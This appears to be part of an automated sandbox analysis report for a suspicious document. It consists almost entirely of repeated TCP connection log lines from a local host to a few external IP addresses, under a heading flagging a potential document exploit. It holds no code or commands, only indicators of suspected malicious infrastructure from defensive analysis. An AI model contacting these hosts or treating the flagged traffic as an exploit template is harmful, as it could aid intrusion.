Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
